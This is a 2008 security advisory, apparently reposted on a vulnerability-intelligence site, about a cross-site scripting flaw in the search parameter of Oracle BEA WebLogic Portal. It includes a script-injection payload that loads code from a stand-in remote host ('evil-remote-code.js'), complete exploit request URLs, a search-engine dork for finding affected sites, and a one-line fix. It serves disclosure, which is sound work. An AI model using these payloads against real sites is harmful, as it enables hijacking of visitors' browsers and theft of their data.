Lucene search
bea-xss.txt
High cross-site scripting vulnerability in Oracle BEA WebLogic Portal allows remote script execution.
Show more
`+============================================================================================+
+ Oracle Corporation BEA WebLogic Portal & high XSS Vulnerabilities +
+============================================================================================+
Author(s): Ivan Sanchez
Producto:
---------
BEA Systems Inc
http://www.bea.com
Oracle Corporation BEA WebLogic Portal (and others)
Nullcode,has reported a vulnerability in BEA WebLogic Portal Domains,
which can be exploited by malicious people to conduct high cross-site scripting attacks.
Input passed to the "q" parameter in this function "search_g4.js" isn't properly sanitised.
This can be exploited to execute remotes arbitrary script in a user's browser.
The vulnerability has been reported in all domains *Bea.com, all sites are using the same function." to search some things"
So..Other versions and others products(BEA-Company) may also be affected.
Google Dork:
-----------
site:bea.com/
You can see hundreds of sites.
Function vulnerable:
--------------------
GET http://www.bea.com/content/search/search_g4.js HTTP/1.1
search_g4.js
("textbox search" ,insert for example): "><script src=http://site/evil-remote-code.js></script>
seconds....
Then redirect to other BEA application:
---------------------------------------
Referer: http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>
GET http://see*.bea.com/search?q="><script src=http://site/evil-remote-code.js></script>&x=12&y=8&ie=latin1&site=all&output=xml_no_dtd&client=www&lr=lang_en&proxystylesheet=www&oe=latin1&filter=p&source=www HTTP/1.1 => HTTP/1.1 200 OK[1.922 s]
seconds..... simply exploited....
Extract Internal code:
1-
<form action="http://seeker.bea.com/search" method="get" class="formspace"><div class="searchSpacer3"> <label for="search"></label><input type="text" name="q" id="search" class="search" title="Enter Search Term" value="Search" onClick="this.value='';"><input type="image" src="/content/images/common/btn_arrowrt_redstr_off.gif" alt="Submit Search" width="22" height="18" border="0" onmouseover="this.src='/content/images/common/btn_arrowrt_redstr_on.gif'"onmouseout="this.src='/content/images/common/btn_arrowrt_redstr_off.gif'" style="vertical-align:bottom;">
2-
you can see URL://"the QueryStrings"
Solution:
---------
Edit the source code to ensure that input is properly sanitised.
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+============================================================================================+
+============================================================================================+
+ Oracle Corporation BEA WebLogic Portal & high XSS Vulnerabilities +
+============================================================================================+
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo02 Jun 2008 00:00Current
7.4High risk
Vulners AI Score7.4